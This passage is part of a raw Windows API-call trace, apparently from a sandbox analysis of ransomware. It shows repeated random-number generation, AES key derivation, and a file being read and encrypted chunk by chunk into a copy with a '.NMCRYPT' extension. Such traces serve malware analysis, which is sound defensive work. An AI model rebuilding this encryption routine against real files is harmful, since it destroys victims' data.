hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.918] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.919] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.920] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.920] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.920] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.920] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d25c | out: phHash=0x60d25c) returned 1 [0164.920] CryptHashData (hHash=0x9ad138, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.920] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x60d260 | out: phKey=0x60d260*=0x9ad1f8) returned 1 [0164.920] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.920] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.920] wcslen (_String="\\\\?\\") returned 0x4 [0164.921] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0164.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0164.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.922] GetFileSizeEx (in: hFile=0x690, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=14049) returned 1 [0164.922] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.922] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.924] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.924] GetLastError () returned 0x0 [0164.924] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.925] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.925] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.925] GetLastError () returned 0x0 [0164.925] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.925] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.925] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.925] GetLastError () returned 0x0 [0164.925] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.925] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.925] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.925] GetLastError () returned 0x0 [0164.925] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.925] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.925] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.926] GetLastError () returned 0x0 [0164.926] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.926] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.926] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.926] GetLastError () returned 0x0 [0164.926] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.926] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.926] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.926] GetLastError () returned 0x0 [0164.926] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.926] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.926] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.926] GetLastError () returned 0x0 [0164.926] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.926] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.926] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.926] GetLastError () returned 0x0 [0164.926] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.926] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.926] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.926] GetLastError () returned 0x0 [0164.926] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.926] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.926] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.926] GetLastError () returned 0x0 [0164.926] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.927] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.927] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.927] GetLastError () returned 0x0 [0164.927] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.927] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.927] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.927] GetLastError () returned 0x0 [0164.927] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.927] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.927] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.927] GetLastError () returned 0x0 [0164.927] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.927] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.927] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.927] GetLastError () returned 0x0 [0164.927] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.927] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.927] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.927] GetLastError () returned 0x0 [0164.927] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.927] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.927] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.927] GetLastError () returned 0x0 [0164.928] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.928] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.928] CryptEncrypt (in: hKey=0x9ad478, 